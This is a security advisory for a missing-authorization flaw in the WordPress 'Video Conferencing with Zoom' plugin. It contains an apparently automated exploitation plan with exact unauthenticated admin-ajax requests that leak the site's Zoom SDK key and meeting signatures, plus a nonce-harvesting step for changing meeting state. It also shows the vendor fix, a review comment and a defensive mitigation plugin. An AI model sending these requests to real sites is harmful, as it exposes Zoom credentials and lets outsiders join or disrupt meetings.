Video Conferencing with Zoom < 4.6.6 - Missing Authorization
Description
The Video Conferencing with Zoom plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to 4.6.6. This makes it possible for unauthenticated attackers to perform an unauthorized action.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Technical Details
Affected versions: < 4.6.6
What Changed in the Fix
Changes introduced in v4.6.6
Source Code
WordPress.org SVN
Exploitation Research Plan: CVE-2026-1368 (Video Conferencing with Zoom < 4.6.6)
1. Vulnerability Summary
The Video Conferencing with Zoom plugin for WordPress is vulnerable to Missing Authorization in its AJAX handlers. Specifically, the function get_auth in includes/admin/class-zvc-admin-ajax.php is registered with the wp_ajax_nopriv_ hook, making it accessible to unauthenticated users.
Crucially, the code contains a commented-out nonce check, meaning the function performs no authorization or CSRF validation. This allows an unauthenticated attacker to generate valid Zoom Web SDK signatures for any meeting ID and retrieve the site's Zoom SDK Key. Additionally, the state_change function is also exposed via nopriv, potentially allowing attackers to modify meeting states if a nonce can be obtained.
2. Attack Vector Analysis
- Endpoint: /wp-admin/admin-ajax.php
- Action: get_auth (and secondary state_change)
- HTTP Method: POST
- Authentication: None (Unauthenticated)
- Vulnerable Parameter: meeting_id (for get_auth), id and state (for state_change)
- Preconditions:
  - The Zoom SDK must be configured/enabled in the plugin settings (specifically vczapi_sdk_key and vczapi_sdk_secret_key must be set).
3. Code Flow
- Entry Point: The plugin registers AJAX hooks in Zoom_Video_Conferencing_Admin_Ajax::__construct() (Line 19):
  ```php
  add_action( 'wp_ajax_nopriv_get_auth', array( $this, 'get_auth' ) );
  ```
- Vulnerable Sink: The get_auth() function (Lines 159-172) is executed:
  ```php
  public function get_auth() {
      // check_ajax_referer( '_nonce_zvc_security', 'noncce' ); // <--- NONCE CHECK COMMENTED OUT
      $meeting_id = filter_input( INPUT_POST, 'meeting_id' );
      if ( vczapi_is_sdk_enabled() ) {
          $sdk_key    = get_option( 'vczapi_sdk_key' );
          $secret_key = get_option( 'vczapi_sdk_secret_key' );
          $signature  = $this->generate_sdk_signature( $sdk_key, $secret_key, $meeting_id, 0 );
          wp_send_json_success( [ 'sig' => $signature, 'key' => $sdk_key, 'type' => 'sdk' ] );
      } else {
          wp_send_json_error( 'Error occured!' );
      }
      wp_die();
  }
  ```
- Execution: The plugin fetches the sensitive vczapi_sdk_secret_key from the database to sign a JWT, and returns the signature (sig) and the vczapi_sdk_key to the unauthenticated requester.
4. Nonce Acquisition Strategy
Primary Target: get_auth
No nonce is required. The source code explicitly shows the check_ajax_referer call is commented out:
```php
// check_ajax_referer( '_nonce_zvc_security', 'noncce' );
```
Secondary Target: state_change
The state_change function is also nopriv but checks a nonce:
```php
check_ajax_referer( '_nonce_zvc_security', 'accss' );
```
To obtain _nonce_zvc_security:
- Shortcode: The plugin likely enqueues this nonce on pages using the [zoom_join_via_browser] (inferred) shortcode or on single meeting posts.
- Strategy:
  - Create a Zoom Meeting post or a page with the join shortcode.
  - Navigate to the page.
  - Use browser_eval to find the nonce in the localized script object. Based on common plugin patterns, it is likely under a global object like vczapi_ajax.
- JS Check: browser_eval("window.vczapi_ajax?.loading_nonce") (inferred) or check the source for _nonce_zvc_security.
5. Exploitation Strategy
Request 1: Generate Meeting Signature (Unauthenticated)
- URL: http://localhost:8080/wp-admin/admin-ajax.php
- Method: POST
- Headers: Content-Type: application/x-www-form-urlencoded
- Body: action=get_auth&meeting_id=888999111
- Goal: Retrieve the sig (JWT) and key (SDK Key).
Request 2: Change Meeting State (Unauthenticated - if Nonce is Found)
- URL: http://localhost:8080/wp-admin/admin-ajax.php
- Method: POST
- Body: action=state_change&accss=[EXTRACTED_NONCE]&id=[MEETING_ID]&state=ended&type=meeting
- Goal: Unauthorized modification of meeting lifecycle.
6. Test Data Setup
- Configure Zoom SDK: Use WP-CLI to simulate a configured environment:
  ```shell
  wp option update vczapi_sdk_key "AKIA-FAKE-SDK-KEY"
  wp option update vczapi_sdk_secret_key "FAKE-SECRET-KEY-SDFGHSDFGHSDFGH"
  # vczapi_is_sdk_enabled() likely checks for these or a specific toggle:
  wp option update vczapi_sdk_enabled 1
  ```
- Create a Meeting:
  ```shell
  wp post create --post_type=zoom-meetings --post_title="Target Meeting" --post_status=publish
  ```
7. Expected Results
- The response to get_auth should be a 200 OK JSON object:
  ```json
  {
    "success": true,
    "data": {
      "sig": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...",
      "key": "AKIA-FAKE-SDK-KEY",
  ```
Summary
The Video Conferencing with Zoom plugin for WordPress is vulnerable to missing authorization due to incorrectly configured AJAX handlers and a commented-out security check. This allows unauthenticated attackers to generate valid Zoom SDK signatures for arbitrary meetings and retrieve the site's Zoom SDK Key, which can be used to join meetings or impersonate users within the Zoom Web SDK context.
Vulnerable Code
```php
// includes/admin/class-zvc-admin-ajax.php lines 19-24
add_action( 'wp_ajax_nopriv_get_auth', array( $this, 'get_auth' ) );
add_action( 'wp_ajax_get_auth', array( $this, 'get_auth' ) );
//Call meeting state
add_action( 'wp_ajax_nopriv_state_change', array( $this, 'state_change' ) );
add_action( 'wp_ajax_state_change', array( $this, 'state_change' ) );

// includes/admin/class-zvc-admin-ajax.php lines 159-172
public function get_auth() {
    // check_ajax_referer( '_nonce_zvc_security', 'noncce' );
    $meeting_id = filter_input( INPUT_POST, 'meeting_id' );
    if ( vczapi_is_sdk_enabled() ) {
        $sdk_key    = get_option( 'vczapi_sdk_key' );
        $secret_key = get_option( 'vczapi_sdk_secret_key' );
        $signature  = $this->generate_sdk_signature( $sdk_key, $secret_key, $meeting_id, 0 );
        wp_send_json_success( [ 'sig' => $signature, 'key' => $sdk_key, 'type' => 'sdk' ] );
    } else {
        wp_send_json_error( 'Error occured!' );
    }
    wp_die();
}
```
Security Fix
@@ -159,8 +159,10 @@ */ public function get_auth() { -// check_ajax_referer( '_nonce_zvc_security', 'noncce' ); + check_ajax_referer( '_nonce_zvc_security', 'noncce' ); $meeting_id = filter_input( INPUT_POST, 'meeting_id' ); if ( vczapi_is_sdk_enabled() ) { + if ( ! current_user_can( 'read' ) ) { + wp_send_json_error( __( 'Unauthorized access', 'video-conferencing-with-zoom-api' ) ); + } $sdk_key = get_option( 'vczapi_sdk_key' ); $secret_key = get_option( 'vczapi_sdk_secret_key' );
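Review bot: the new `current_user_can( 'read' )` check sits inside the `if ( vczapi_is_sdk_enabled() )` branch, after `filter_input` has already run, so it only guards the signing path; move it to the top of `get_auth()`, directly after the restored `check_ajax_referer` call, so the handler fails closed regardless of SDK configuration. Note that the restored nonce check on its own does not exclude anonymous callers: WordPress also issues nonces to logged-out visitors (user ID 0), so a nonce printed on a public meeting page will pass `check_ajax_referer`; the capability check is the line that actually enforces authorization here, and since `wp_send_json_error` ends the request via `wp_die()`, no explicit `return` is needed after it. Worth deciding in the same change whether the `wp_ajax_nopriv_get_auth` registration (outside this hunk) should be dropped now that the handler requires a logged-in user.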
Exploit Outline
The vulnerability is exploited by interacting with the `get_auth` AJAX action via `admin-ajax.php`.
1. Target Endpoint: Send a POST request to `/wp-admin/admin-ajax.php`.
2. Payload Shape: Set the `action` parameter to `get_auth` and provide an arbitrary `meeting_id` (e.g., 123456789).
3. Authentication: No authentication is required because the action is registered via `wp_ajax_nopriv_` and the internal `check_ajax_referer` call is commented out in vulnerable versions.
4. Result: The server will return a JSON success response containing the site's Zoom SDK Key and an HMAC-SHA256 signature (JWT) which allows the attacker to join the specified meeting through the Zoom Web SDK.
Additionally, the `state_change` action is also exposed via `nopriv`, which could allow an attacker to modify meeting statuses if they can obtain a valid security nonce from a public-facing meeting page.
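A temporary, operator-side mitigation for the behaviour described above, written as an added example (not code from the plugin or the advisory): a must-use plugin that hooks the same nopriv actions at priority 1 so the plugin's handler never runs for anonymous callers, logs each blocked attempt for detection, and mirrors the vendor's `read` capability check for logged-in users. It assumes the hook names quoted in the Vulnerable Code section and that the file is placed in wp-content/mu-plugins; remove it once the plugin is at 4.6.6 or later.

```php
<?php
/**
 * Plugin Name: Temporary hardening for Video Conferencing with Zoom < 4.6.6
 * Description: Blocks and logs unauthenticated calls to the get_auth and
 *              state_change admin-ajax actions until the plugin is updated.
 *
 * Added example, not part of the plugin. Mirrors the vendor fix: callers must be
 * logged in and hold the 'read' capability. Like the fix, this also disables
 * anonymous join-via-browser for the affected actions.
 */

defined( 'ABSPATH' ) || exit;

/**
 * Fail closed for the two nopriv actions named in the advisory.
 * Priority 1 runs before the plugin's own handler (default priority 10),
 * so the secret key is never read and no signature is produced.
 */
function zvc_hardening_block_anonymous() {
    $action = isset( $_REQUEST['action'] ) ? sanitize_key( wp_unslash( $_REQUEST['action'] ) ) : '';
    $ip     = isset( $_SERVER['REMOTE_ADDR'] ) ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ) : 'unknown';

    // Detection signal: one log line per blocked attempt; no secrets are logged.
    error_log( sprintf( 'zvc-hardening: blocked anonymous admin-ajax action=%s from %s', $action, $ip ) );

    wp_send_json_error( 'Unauthorized access', 403 ); // ends the request via wp_die()
}

// Hook names are the nopriv registrations quoted from class-zvc-admin-ajax.php (lines 19-24).
add_action( 'wp_ajax_nopriv_get_auth',     'zvc_hardening_block_anonymous', 1 );
add_action( 'wp_ajax_nopriv_state_change', 'zvc_hardening_block_anonymous', 1 );

/**
 * Logged-in callers: apply the same 'read' capability check the vendor fix adds,
 * so a custom role without 'read' cannot obtain signatures either.
 */
function zvc_hardening_require_read() {
    if ( ! current_user_can( 'read' ) ) {
        wp_send_json_error( 'Unauthorized access', 403 );
    }
}
add_action( 'wp_ajax_get_auth',     'zvc_hardening_require_read', 1 );
add_action( 'wp_ajax_state_change', 'zvc_hardening_require_read', 1 );
```

The `zvc-hardening:` log lines give a simple indicator to alert on while the plugin is being updated; absence of such lines after the update is not proof of absence, since the vendor fix rejects anonymous calls silently.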